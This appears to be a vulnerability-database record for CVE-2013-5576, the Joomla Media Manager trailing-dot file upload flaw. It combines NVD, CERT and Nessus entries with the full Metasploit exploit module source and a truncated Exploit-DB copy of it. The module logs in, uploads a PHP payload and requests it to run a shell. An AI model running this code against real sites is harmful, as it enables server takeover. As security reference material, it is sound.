{"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5576"]}, {"type": "dsquare", "idList": ["E-333", "E-334"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:27610"]}, {"type": "cert", "idList": ["VU:639620"]}, {"type": "nessus", "idList": ["JOOMLA_2514.NASL"]}], "modified": "2019-05-29T19:48:20", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2019-05-29T19:48:20", "rev": 2}, "vulnersScore": 6.7}, "published": "2013-10-09T14:54:00", "id": "JOOMLA_MM_RCE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "edition": 2, "bulletinFamily": "exploit", "viewCount": 13, "cvelist": ["CVE-2013-5576"], "modified": "2013-10-09T14:54:00", "references": [], "description": "**Name**| joomla_mm_rce \n---|--- \n**CVE**| CVE-2013-5576 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| joomla_mm_rce \n**Notes**| Repeatability: Infinite \nNotes: \n \nThis module was tested in a Joomla 3.1.4 on Windows 7. \n \nDepending on the configuration of the site this module may require valid \ncredentials in order to exploit the file upload vulnerability. \n \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5576 \nVENDOR: Joomla \nCVE Name: CVE-2013-5576 \n\n", "type": "canvas", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/joomla_mm_rce", "lastseen": "2019-05-29T19:48:20", "reporter": "Immunity Canvas", "title": "Immunity Canvas: JOOMLA_MM_RCE", "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:46:06", "description": "administrator/components/com_media/helpers/media.php in the media manager in Joomla! 2.5.x before 2.5.14 and 3.x before 3.1.5 allows remote authenticated users or remote attackers to bypass intended access restrictions and upload files with dangerous extensions via a filename with a trailing . (dot), as exploited in the wild in August 2013.", "edition": 3, "cvss3": {}, "published": "2013-10-09T14:54:00", "title": "CVE-2013-5576", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5576"], "modified": "2013-12-01T04:31:00", "cpe": ["cpe:/a:joomla:joomla\\!:2.5.1", "cpe:/a:joomla:joomla\\!:3.0.0", "cpe:/a:joomla:joomla\\!:2.5.10", "cpe:/a:joomla:joomla\\!:3.0.3", "cpe:/a:joomla:joomla\\!:2.5.11", "cpe:/a:joomla:joomla\\!:3.1.4", "cpe:/a:joomla:joomla\\!:2.5.4", "cpe:/a:joomla:joomla\\!:2.5.3", "cpe:/a:joomla:joomla\\!:3.1.2", "cpe:/a:joomla:joomla\\!:2.5.2", "cpe:/a:joomla:joomla\\!:2.5.13", "cpe:/a:joomla:joomla\\!:2.5.12", "cpe:/a:joomla:joomla\\!:3.1.0", "cpe:/a:joomla:joomla\\!:2.5.6", "cpe:/a:joomla:joomla\\!:3.1.1", "cpe:/a:joomla:joomla\\!:3.0.4", "cpe:/a:joomla:joomla\\!:2.5.9", "cpe:/a:joomla:joomla\\!:3.1.3", "cpe:/a:joomla:joomla\\!:2.5.8", "cpe:/a:joomla:joomla\\!:2.5.0", "cpe:/a:joomla:joomla\\!:3.0.2", "cpe:/a:joomla:joomla\\!:2.5.7", "cpe:/a:joomla:joomla\\!:2.5.5", "cpe:/a:joomla:joomla\\!:3.0.1"], "id": "CVE-2013-5576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5576", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.10:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "description": "File upload vulnerability in Joomla Media Manager\n\nVulnerability Type: File Upload", "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "E-333", "href": "", "type": "dsquare", "title": "Joomla 2.5.13 & 3.1.4 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "description": "File upload vulnerability in Joomla Media Manager\n\nVulnerability Type: File Upload", "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "E-334", "href": "", "type": "dsquare", "title": "Joomla 1.5.26 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:41:53", "bulletinFamily": "info", "cvelist": ["CVE-2013-5576"], "description": "### Overview \n\nAn authenticated attacker may be able to upload active content to websites running older versions of Joomla.\n\n### Description \n\n[**CWE-434**](<http://cwe.mitre.org/data/definitions/434.html>)**: Unrestricted Upload of File with Dangerous Type**\n\nA vulnerability has been discovered in older versions of the Joomla! content management software that allow an authenticated attacker to upload active content through the media manager form ('administrator/components/com_media/helpers/media.php'). Joomla! allows files with a trailing '.' to pass the upload checks. \n \nThis active content could potentially give an attacker control over the site or serve malicious code to visitors of the site. \n \nJoomla versions 1.6 and greater allow site owners to grant public access to the media manager. For versions 1.5 and greater, the default configuration of Joomla only allows privileged users to access the media manager form. We are not aware if versions earlier than 1.5 are affected. We will update this note as we become aware of more information. \n \nAccording to an [advisory](<http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads>) by the Joomla Security Center, the following versions are affected:\n\n * 2.5.13 and earlier 2.5.x versions\n * 3.1.4 and earlier 3.x versions \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply an Update** \nUpdate to versions 2.5.14 or 3.1.5 or greater. In addition, please consider the following workarounds: \n \n--- \n \n**Restrict Access** \n \nApply the appropriate access controls to ensure that only authorized users may access the media manager. \n \n--- \n \n### Vendor Information\n\n639620\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Joomla Affected\n\nUpdated: October 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 6.7 | E:POC/RL:OF/RC:C \nEnvironmental | 5.3 | CDP:L/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://osvdb.org/show/osvdb/95933>\n * <http://developer.joomla.org/security/563-20130801-core-unauthorised-uploads.html>\n * [http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&%20tracker_item_id=31626](<http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&%20tracker_item_id=31626>)\n * <https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8>\n * <http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/>\n * <http://www.exploit-db.com/exploits/27610/>\n * <http://blog.sucuri.net/2013/08/joomla-media-manager-attacks-in-the-wild.html>\n * <http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/>\n\n### Acknowledgements\n\nThanks to Versafe for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-5576](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-5576>) \n---|--- \n**Date Public:** | 2013-07-31 \n**Date First Published:** | 2013-10-30 \n**Date Last Updated: ** | 2013-10-30 15:40 UTC \n**Document Revision: ** | 16 \n", "modified": "2013-10-30T15:40:00", "published": "2013-10-30T00:00:00", "id": "VU:639620", "href": "https://www.kb.cert.org/vuls/id/639620", "type": "cert", "title": "Joomla! Media Manager allows arbitrary file upload and execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T03:19:20", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.14\nor 3.x prior to 3.1.5. It is, therefore, affected by a remote code\nexecution vulnerability due to a failure by the\nadministrator/components/com_media/helpers/media.php script to\nproperly validate the extension of an uploaded file. This allows files\nwith '.php.' extensions to be uploaded and placed in a user-accessible\npath. An attacker can exploit this issue, via a direct request to such\nan uploaded file, to execute arbitrary PHP code with the privileges of\nthe web server.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 30, "cvss3": {"score": 6.3, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"}, "published": "2013-08-08T00:00:00", "title": "Joomla! 2.5.x < 2.5.14 / 3.x < 3.1.5 .php. File Upload RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5576"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_2514.NASL", "href": "https://www.tenable.com/plugins/nessus/69273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69273);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-5576\");\n script_bugtraq_id(61582);\n script_xref(name:\"CERT\", value:\"639620\");\n\n script_name(english:\"Joomla! 2.5.x < 2.5.14 / 3.x < 3.1.5 .php. File Upload RCE\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.14\nor 3.x prior to 3.1.5. It is, therefore, affected by a remote code\nexecution vulnerability due to a failure by the\nadministrator/components/com_media/helpers/media.php script to\nproperly validate the extension of an uploaded file. This allows files\nwith '.php.' extensions to be uploaded and placed in a user-accessible\npath. An attacker can exploit this issue, via a direct request to such\nan uploaded file, to execute arbitrary PHP code with the privileges of\nthe web server.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01c258b2\");\n # https://www.joomla.org/announcements/release-news/5506-joomla-2-5-14-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3653e23d\");\n # https://www.joomla.org/announcements/release-news/5505-joomla-3-1-5-stable-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7f239a18\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 2.5.14 / 3.1.5 or later. Alternatively,\napply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5576\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Joomla 2.5.13 & 3.1.4 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla Media Manager File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"2.5.14 / 3.1.5\";\n\n# Check granularity\nif (version =~ \"^2(\\.5)?$\" || version =~ \"^3(\\.1)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions 2.5.x < 2.5.14 and 3.x < 3.1.5 are vulnerable\nif (\n version =~ \"^2\\.5($|\\.([0-9]|1([0-3]))($|[^0-9]))\" ||\n version =~ \"^3\\.0($|[^0-9])\" ||\n version =~ \"^3\\.1($|\\.[0-4]($|[^0-9]))\"\n)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-12T22:37:31", "description": "This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly.\n", "published": "2013-08-13T21:27:27", "type": "metasploit", "title": "Joomla Media Manager File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Joomla Media Manager File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\n arbitrary code execution. The module has been tested successfully on Joomla 2.5.13\n and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media\n Manager, you will need to supply a valid username and password (Editor role or\n higher) in order to work properly.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-5576' ],\n [ 'OSVDB', '95933' ],\n [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],\n [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],\n [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],\n [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ],\n [ 'URL', 'https://blog.rapid7.com/2013/08/15/time-to-patch-joomla' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true,\n # Arbitrary big number. The payload gets sent as POST data, so\n # really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-08-01',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\n OptString.new('USERNAME', [true, 'User to login with', '']),\n OptString.new('PASSWORD', [true, 'Password to login with', '']),\n ])\n\n end\n\n def check\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302)\n if res.body =~ /You are not authorised to view this resource/\n vprint_status(\"Joomla Media Manager Found but authentication required\")\n return Exploit::CheckCode::Detected\n elsif res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n vprint_status(\"Joomla Media Manager Found and authentication isn't required\")\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def upload(upload_uri)\n begin\n u = URI(upload_uri)\n rescue ::URI::InvalidURIError\n fail_with(Failure::Unknown, \"Unable to get the upload_uri correctly\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(payload.encoded, \"application/x-php\", nil, \"form-data; name=\\\"Filedata[]\\\"; filename=\\\"#{@upload_name}.\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{u.path}?#{u.query}\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'cookie' => @cookies,\n 'vars_get' => {\n 'asset' => 'com_content',\n 'author' => '',\n 'format' => '',\n 'view' => 'images',\n 'folder' => ''\n },\n 'data' => post_data\n })\n\n return res\n\n end\n\n def get_upload_form\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"index.php\"),\n 'cookie' => @cookies,\n 'encode_params' => false,\n 'vars_get' => {\n 'option' => 'com_media',\n 'view' => 'images',\n 'e_name' => 'jform_articletext',\n 'asset' => 'com_content',\n 'author' => ''\n }\n })\n\n return res\n end\n\n def get_login_form\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\n 'cookie' => @cookies,\n 'vars_get' => {\n 'view' => 'login'\n }\n })\n\n return res\n\n end\n\n def login\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\n 'cookie' => @cookies,\n 'vars_get' => {\n 'task' => 'user.login'\n },\n 'vars_post' => {\n 'username' => @username,\n 'password' => @password\n }.merge(@login_options)\n })\n\n return res\n end\n\n def parse_login_options(html)\n html.scan(/<input type=\"hidden\" name=\"(.*)\" value=\"(.*)\" \\/>/) {|option|\n @login_options[option[0]] = option[1] if option[1] == \"1\" # Searching for the Token Parameter, which always has value \"1\"\n }\n end\n\n def exploit\n @login_options = {}\n @cookies = \"\"\n @upload_name = \"#{rand_text_alpha(rand(5) + 3)}.php\"\n @username = datastore['USERNAME']\n @password = datastore['PASSWORD']\n\n print_status(\"Checking Access to Media Component...\")\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/\n print_status(\"Authentication required... Proceeding...\")\n\n if @username.empty? or @password.empty?\n fail_with(Failure::BadConfig, \"#{peer} - Authentication is required to access the Media Manager Component, please provide credentials\")\n end\n @cookies = res.get_cookies.sub(/;$/, \"\")\n\n print_status(\"Accessing the Login Form...\")\n res = get_login_form\n if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/\n fail_with(Failure::Unknown, \"#{peer} - Unable to Access the Login Form\")\n end\n parse_login_options(res.body)\n\n res = login\n if not res or res.code != 303\n fail_with(Failure::NoAccess, \"#{peer} - Unable to Authenticate\")\n end\n elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n print_status(\"Authentication isn't required.... Proceeding...\")\n @cookies = res.get_cookies.sub(/;$/, \"\")\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to Access the Media Manager Component\")\n end\n\n print_status(\"Accessing the Upload Form...\")\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n upload_uri = Rex::Text.html_decode($1)\n else\n fail_with(Failure::Unknown, \"#{peer} - Unable to Access the Upload Form\")\n end\n\n print_status(\"Uploading shell...\")\n\n res = upload(upload_uri)\n\n if res.nil? or res.code != 200\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n register_files_for_cleanup(\"#{@upload_name}.\")\n print_status(\"Executing shell...\")\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"images\", @upload_name),\n })\n\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/joomla_media_upload_exec.rb"}], "exploitdb": [{"lastseen": "2016-02-03T06:19:49", "description": "Joomla Media Manager File Upload Vulnerability. CVE-2013-5576. Remote exploit for php platform", "published": "2013-08-15T00:00:00", "type": "exploitdb", "title": "Joomla Media Manager File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "modified": "2013-08-15T00:00:00", "id": "EDB-ID:27610", "href": "https://www.exploit-db.com/exploits/27610/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Joomla Media Manager File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\r\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\r\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\r\n arbitrary code execution. The module has been tested successfully on Joomla 2.5.13\r\n and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media\r\n Manager, you will need to supply a valid username and password (Editor role or\r\n higher) in order to work properly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '95933' ],\r\n [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],\r\n [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],\r\n [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],\r\n [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n # Arbitrary big number. The payload gets sent as POST data, so\r\n # really it's unlimited\r\n 'Space' => 262144, # 256k\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Joomla 2.5.x <=2.5.13', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 01 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\r\n OptString.new('USERNAME', [false, 'User to login with', '']),\r\n OptString.new('PASSWORD', [false, 'Password to login with', '']),\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def check\r\n res = get_upload_form\r\n\r\n if res and res.code == 200\r\n if res.body =~ /You are not authorised to view this resource/\r\n print_status(\"#{peer} - Joomla Media Manager Found but authentication required\")\r\n return Exploit::CheckCode::Detected\r\n elsif res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n print_status(\"#{peer} - Joomla Media Manager Found and authentication isn't required\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def upload(upload_uri)\r\n begin\r\n u = URI(upload_uri)\r\n rescue ::URI::InvalidURIError\r\n fail_with(Exploit::Failure::Unknown, \"Unable to get the upload_uri correctly\")\r\n end\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part(payload.encoded, \"application/x-php\", nil, \"form-data; name=\\\"Filedata[]\\\"; filename=\\\"#{@upload_name}.\\\"\")\r\n post_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{u.path}?#{u.query}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'asset' => 'com_content',\r\n 'author' => '',\r\n 'format' => '',\r\n 'view' => 'images',\r\n 'folder' => ''\r\n },\r\n 'data' => post_data\r\n })\r\n\r\n return res\r\n\r\n end\r\n\r\n def get_upload_form\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\"),\r\n 'cookie' => @cookies,\r\n 'encode_params' => false,\r\n 'vars_get' => {\r\n 'option' => 'com_media',\r\n 'view' => 'images',\r\n 'tmpl' => 'component',\r\n 'e_name' => 'jform_articletext',\r\n 'asset' => 'com_content',\r\n 'author' => ''\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n def get_login_form\r\n\r\n res = send_request_cgi({\r\n 'method' => 